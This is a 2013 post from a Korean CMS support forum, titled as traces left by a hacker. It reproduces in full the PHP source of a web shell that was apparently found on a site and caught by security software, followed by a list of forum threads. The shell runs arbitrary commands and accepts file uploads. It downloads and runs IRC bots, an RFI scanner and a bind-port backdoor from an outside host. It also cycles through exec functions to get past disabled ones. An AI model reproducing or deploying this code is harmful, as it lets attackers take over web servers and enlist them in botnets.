포럼

  2. Support
  3. 포럼

해커의 흔적.

2013.07.22 05:52

엘카

?><html><head>

<style type="text/css">

<!--

body,table { font-family:verdana;font-size:11px;color:white;background-color:black; }

table { width:100%; }

table,td { border:1px solid #808080;margin-top:2;margin-bottom:2;padding:5px; }

a { color:lightblue;text-decoration:none; }

a:active { color:#00FF00; }

a:link { color:#5B5BFF; }

a:hover { text-decoration:underline; }

a:visited { color:#99CCFF; }

input,select,option { font:8pt tahoma;color:#FFFFFF;margin:2;border:1px solid #666666; }

textarea { color:#dedbde;font:8pt Courier New;border:1px solid #666666;margin:2; }

input[type="submit"] { border:1px solid #000000; }

input[type="text"] { padding:3px;}

input,select,option,input[type="submit"]:hover { background-color:#333333; }

textarea { background-color:#000000; }

// -->

</style>

<title>-LampungCyber Community-</title>

</head>

<body><center><hr noshade size=1><h2>diKi Simple Shell Injectionz v0.01</h2><p>

<hr noshade size=1>

Thanks to : arch_fajri - lampungcarding - chandra35 - singkong @ irc.bandarlampung.us</center></p>

<hr noshade size=1>


<?php

error_reporting(4);

$sh_mainurl = "http://www.bandarlampung.us/irc/";

$sh_sourcez = array(

  "dQ99Sh"   => array($sh_mainurl."readme.txt","kiddie.php"),

  "dQBNC"   => array($sh_mainurl."dQBNC.tar.gz","dQBNC.tar.gz"),

  "Eggdrop"  => array($sh_mainurl."allnet.tar.gz","allnet.tar.gz"),

  "BindDoor" => array($sh_mainurl."proxy.tgz","proxy.tgz"),

  "RFIScaN" => array($sh_mainurl."404.txt","error.txt"),

);


if (safemode()) { $dsafe = "<font color=#3366FF><b>ON</b></font>"; }

else { $dsafe = "<font color=#3366FF><b>OFF</b></font>"; }


echo "Safe     : $dsafe OS: ".info(php_uname())."<br>".

     "Software : ".info(getenv("SERVER_SOFTWARE"))."<br>".

     "Userid   : ".info(aJ99exec("id"))."<br>".

     "IP Target: ".info(gethostbyname($_SERVER["HTTP_HOST"]))."<br>".

     "IP Anda  : ".info($_SERVER["REMOTE_ADDR"])."<br>";

if (isset($_POST['dir'])) {

  $dir = $_POST['dir'];

  if (!@chdir($dir)) { echo "Ga bisa masuk $dir | "; }

}

else { $dir = getcwd(); }

echo "Direktory: $dir ";

if (is_writable($dir)) { echo "[Writable]"; } else { echo "[Readonly]"; }

?>


<hr noshade size=1>

<center>

<textarea cols=130 rows=20>


<?php


if (empty($_POST['portpsy'])) { $portpsy = 27071; }

if (empty($_POST['bip'])) { $bip = gethostbyname($_SERVER["HTTP_HOST"]); }

if (isset($_POST['bot1'])) {

  $chan1 = $_POST['channel1'];

  $sirc1 = $_POST['serverirc1'];

  echo "Downloading Scanbot 1..\n";

  echo aJ99exec("cd /dev/shm;wget ".$sh_sourcez["RFIScaN"][0]);

  echo "Loading RFI Scanbot.. $chan1 at $sirc1 $port1\n";

  echo aJ99exec("cd /dev/shm;perl ".$sh_sourcez["RFIScaN"][1]." $chan1 $sirc1 $port1;");

}

elseif (isset($_POST['psy'])) {

  $portpsy = $_POST['portpsy'];

  echo aJ99exec("wget ".$sh_sourcez["dQBNC"][0].";tar -zxf ".$sh_sourcez["dQBNC"][1]);

  echo aJ99exec("cd .dQBNC;./config admin $portpsy;./fuck;./run");

}

elseif (isset($_POST['egg'])) {

  $bf = $_POST['bf'];

  $bnick = $_POST['bnick'];

  $bident = $_POST['bident'];

  $bip = $_POST['bip'];

  $bchan = $_POST['bchan'];

  $bowner = $_POST['bowner'];

  echo aJ99exec("wget ".$sh_sourcez["Eggdrop"][0].";tar -zxf ".$sh_sourcez["Eggdrop"][1]);

  echo aJ99exec('cd .allnet;./dhie '.$bf.' '.$bnick.' '.$bident.' '.$bip.' '.$bchan.' '.$bowner);

  echo aJ99exec('cd .allnet;./dssl '.$bf.';cd scripts;./autobotchk '.$bf.' -noemail -5');

elseif (isset($_POST['eggrun'])) {

  $bf = $_POST['bf'];

  $bnick = $_POST['bnick'];

  $bident = $_POST['bident'];

  $bip = $_POST['bip'];

  $bchan = $_POST['bchan'];

  $bowner = $_POST['bowner'];

  echo aJ99exec('cd .allnet;./dhie '.$bf.' '.$bnick.' '.$bident.' '.$bip.' '.$bchan.' '.$bowner);

  echo aJ99exec('cd .allnet;./dssl '.$bf.';cd scripts;./autobotchk '.$bf.' -noemail -5');

}

elseif (isset($_POST['bind'])) {

  echo aJ99exec("wget ".$sh_sourcez["BindDoor"][0].";tar -zxf ".$sh_sourcez["BindDoor"][1].";cd pro;./prox -d -a -p22222");

}

elseif (isset($_POST['cmd'])) {

  $cmdtxt = $_POST['cmdtxt'];

  $ret = aJ99exec($cmdtxt); echo htmlspecialchars($ret);

}


?>

</textarea>

</center>

<hr noshade size=1>

<!-- <form enctype="multipart/form-data" action="" method="POST">

<input type="hidden" name="MAX_FILE_SIZE" value="100000" />

UPLOAD File: <input name="file" type="file" />

<input type="submit" value="UPLOAD" />

</form> -->

<hr noshade size=1>

<form method="POST" enctype="multipart/form-data">

<input type=hidden name="dir" value="<?php echo $dir; ?>">

Direktori: <input type="text" size=40 value="<?php echo $dir; ?>" name="dir" />

Command: <input type="text" size=80 value="<?php echo $cmdtxt; ?>" name="cmdtxt" />

<input type="submit" value="Execute" name="cmd" /><br>

</form>

<!-- <hr noshade size=1>

<form method="POST" enctype="multipart/form-data">

<input type=hidden name="dir" value="<?php echo $dir; ?>">

Port: <input type="text" size=6 value="<?php echo $portpsy; ?>" name="portpsy" />

<input type="submit" value="dQBNC" name="psy" />

<input type="submit" value="Elite Proxy" name="bind" />

</form> -->

<hr noshade size=1>

<hr noshade size=1>

<form method="POST" enctype="multipart/form-data">

<input type=hidden name="dir" value="<?php echo $dir; ?>">

<strong>Install EggDrop : </strong><p>

File: <input type="text" size=10 value="<?php echo $bf; ?>" name="bf" />

Nick: <input type="text" size=10 value="<?php echo $bnick; ?>" name="bnick" />

Ident: <input type="text" size=10 value="<?php echo $bident; ?>" name="bident" />

IP: <input type="text" size=10 value="<?php echo $bip; ?>" name="bip" />

Chan: <input type="text" size=10 value="<?php echo $bchan; ?>" name="bchan" />

Owner: <input type="text" size=10 value="<?php echo $bowner; ?>" name="bowner" />

<input type="submit" value="Install Eggdrop" name="egg" />

<input type="submit" value="Load Eggdrop" name="eggrun" />

</form>

<hr noshade size=1>

<hr noshade size=1>

<!-- <form method="POST" enctype="multipart/form-data">

<input type=hidden name="dir" value="<?php echo $dir; ?>">

Chan: <input type="text" size=6 value="<?php echo $channel1; ?>" name="channel1" />

Server: <input type="text" value="<?php echo $serverirc1; ?>" name="serverirc1" />

Port: <input type="text" value="<?php echo $port1; ?>" name="port1" />

<input type="submit" value="RFIBotScaN" name="bot1" />

</form> -->

<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">

<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>

<?php

if( $_POST['_upl'] == "Upload" ) {

if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload OK!!!</b><br><br>'; }

else { echo '<b>Upload FAILED!!!</b><br><br>'; }

}

?>

<?php


function info($txt){ return "<font color=lime>".$txt."</font>"; }

###########################

## aJ99Sh CORE FUNCTIONS ##

###########################

function safemode() {

  if ( @ini_get("safe_mode") OR eregi("on",@ini_get("safe_mode")) ) { return TRUE; }

  else { return FALSE; }

}

function getdisfunc() {

  $disfunc = @ini_get("disable_functions");

  if (!empty($disfunc)) {

    $disfunc = str_replace(" ","",$disfunc);

    $disfunc = explode(",",$disfunc);

  }

  else { $disfunc= array(); }

  return $disfunc;

}

function enabled($func) {

 if ( is_callable($func) && !in_array($func,getdisfunc()) ) { return TRUE; }

 else { return FALSE; }

}

function aJ99exec($cmd) {

  $output = "";

  if ( enabled("popen") ) {

    $h = popen($cmd.' 2>&1', 'r');

    if ( is_resource($h) ) {

      while ( !feof($h) ) { $output .= fread($h, 2096);  }

      pclose($h);

    }

  }

  elseif ( enabled("passthru") ) { @ob_start(); passthru($cmd); $output = @ob_get_contents(); @ob_end_clean(); }

  elseif ( enabled("shell_exec") ) { $output = shell_exec($cmd); }

  elseif ( enabled("exec") ) { exec($cmd,$o); $output = join("\r\n",$o); }

  elseif ( enabled("system") ) { @ob_start(); system($cmd); $output = @ob_get_contents(); @ob_end_clean(); }


  else { $output = "NULL"; }

  return $output;

}

function aJ99exec2($cmd) {

  $output = "";

  if ( enabled("system") ) { @ob_start(); system($cmd); $output = @ob_get_contents(); @ob_end_clean(); }

  elseif ( enabled("exec") ) { exec($cmd,$o); $output = join("\r\n",$o); }

  elseif ( enabled("shell_exec") ) { $output = shell_exec($cmd); }

  elseif ( enabled("passthru") ) { @ob_start(); passthru($cmd); $output = @ob_get_contents(); @ob_end_clean(); }

  elseif ( enabled("popen") ) {

    $h = popen($cmd.' 2>&1', 'r');

    if ( is_resource($h) ) {

      while ( !feof($h) ) { $output .= fread($h, 2096);  }

      pclose($h);

    }

  }

  return $output;

}


die();

?><?



보안 프로그램에 걸린 해커의 흔적

이 게시물을

http://elkha.kr/

좋아요(+6)
목록
글쓴이 제목 최종 글
한마음^^ 1.5.4 이미지 자동삽입 선택적 적용이 가능한가요?  
Treasurej 인기글 기간 설정 추가되었습니다. [5] 2013.01.14 by :DunhillBoy
웹엔진 wechat을 개발중인데요.. [13] 2013.01.15 by 웹엔진
컴토피아 자동고정되는 스킨고정 기능...? [3] file 2013.01.16 by 컴토피아
이레미 live.com 로그인 레이아웃 [12] file 2013.01.16 by 이레미
민채아빠 게시판에서 공지사항 리스트에서 내리는 애드온 만들려고 하는데.. 어렵네요.. [2] 2013.01.17 by 민채아빠
exou PHP_EOL ?? [3] 2013.01.17 by 퍼니엑스이
音志 혹시 이러한 위젯 제작가능하신분 ''.. [9] file 2013.01.17 by 꿈틀잉
시작하는초보 제발 고수님들의 도움좀.... [1] file 2013.01.17 by stone돌미
라미아스튜디오 가격이 천차만별인 SSL인증서, 무얼 설치해야할지 조언을 얻을 수 있을까요? [6] 2013.01.18 by CM(OEZ)
본체 업데이트 오류,,  
sejin7940 몸에 좋은 쓴 약. 안 쓴 캡슐로 싼다고 그 좋은 효력이 줄지 않습니다. [2] 2013.01.19 by 音志
똑디 php4버전은 언제부터 지원이 중단될까요? [5] 2013.01.19 by 컴토피아
산음 도와주세요... 1.4.x에서 1.5 최신버젼 업뎃오류 [1] 2013.01.19 by 컴토피아
CMD Xzet 1.4.5.18 (XE 1.4.x 보안 패치) - 2012/12/31 [8] 2013.01.19 by Garon
이레미 XE 설치중에.. [4] 2013.01.19 by 이레미
초보개발자 [해결함] 갑자기 에디터에서 첨부파일이 되지 않습니다. [2] 2013.01.21 by Xiso
초보개발자 [해결함] 에디터에서 파일첨부가 되질 않습니다.  
자유로 1.4X에서 1.5X로 업그레이트 후 관리자 페이지 동작 불능입니다. [3] 2013.01.22 by 자유로
진정한승리 XE 모듈개발시 개발환경 세팅에 대해 자랑질 한마디씩 해주세요. [11] 2013.01.22 by 데미갓
태그 쓰기